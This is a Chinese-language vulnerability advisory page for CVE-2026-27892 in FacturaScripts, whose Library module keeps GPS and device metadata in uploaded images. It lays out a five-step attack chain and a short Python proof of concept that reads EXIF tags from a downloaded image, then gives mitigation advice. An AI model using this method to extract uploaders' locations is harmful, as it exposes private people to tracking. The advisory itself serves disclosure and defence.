CVE-2026-27892 CVSS 6.5 中危

CVE-2026-27892 FacturaScripts元数据泄露漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27892

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FacturaScripts

漏洞概述

FacturaScripts是一款开源会计软件。在2026版本之前，其Library模块存储图片时未去除EXIF/XMP/IPTC元数据。任何经过身份认证的用户下载图片后，均可提取上传者的GPS坐标、设备信息等敏感隐私数据。

技术细节

该漏洞由于FacturaScripts的Library模块在处理图片上传时缺乏服务端元数据清理机制。当用户上传图片时，服务器直接保存原始字节流，保留了完整的EXIF、XMP和IPTC信息。由于系统允许低权限用户下载这些图片，攻击者只需获取图片文件，利用ExifTool等工具解析，即可获取上传者的GPS位置、设备型号、拍摄时间等PII信息，可能导致物理位置暴露。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者注册并获取一个低权限账户，成功登录FacturaScripts系统。

STEP 2

步骤2：定位目标图片

攻击者浏览Library模块，查找受害者上传的图片文件。

STEP 3

步骤3：下载图片

攻击者点击下载目标图片到本地计算机。

STEP 4

步骤4：提取元数据

攻击者使用ExifTool或Python脚本解析下载的图片文件，读取EXIF数据。

STEP 5

步骤5：获取敏感信息

攻击者从元数据中解析出GPS坐标、设备型号等信息，推断受害者物理位置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept: Extracting Metadata from a Downloaded Image
# This script simulates an attacker analyzing a downloaded image from FacturaScripts.

import exifread
from PIL import Image
import sys

def extract_metadata(image_path):
    try:
        # Open the image file in binary mode
        with open(image_path, 'rb') as f:
            tags = exifread.process_file(f)
            
        print(f"[*] Analyzing {image_path} for metadata...")
        
        if not tags:
            print("[-] No EXIF metadata found.")
            return

        # Check for GPS info
        gps_keys = [key for key in tags.keys() if key.startswith('GPS')]
        if gps_keys:
            print("[+] GPS Information Found:")
            for key in gps_keys:
                print(f"    {key}: {tags[key]}")
        else:
            print("[-] No GPS Information found.")

        # Check for Device/Software info
        device_keys = ['Image Make', 'Image Model', 'Image Software', 'EXIF DateTimeOriginal']
        for key in device_keys:
            if key in tags:
                print(f"[+] {key}: {tags[key]}")

    except FileNotFoundError:
        print(f"Error: File '{image_path}' not found.")
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    # Usage: python poc.py <image_file>
    if len(sys.argv) < 2:
        print("Usage: python poc.py <path_to_image>")
        sys.exit(1)
    
    extract_metadata(sys.argv[1])

影响范围

FacturaScripts < 2026

防御指南

临时缓解措施

在升级前，建议管理员暂时禁用Library模块的图片上传功能，或配置反向代理在文件传输前自动剥离图片元数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表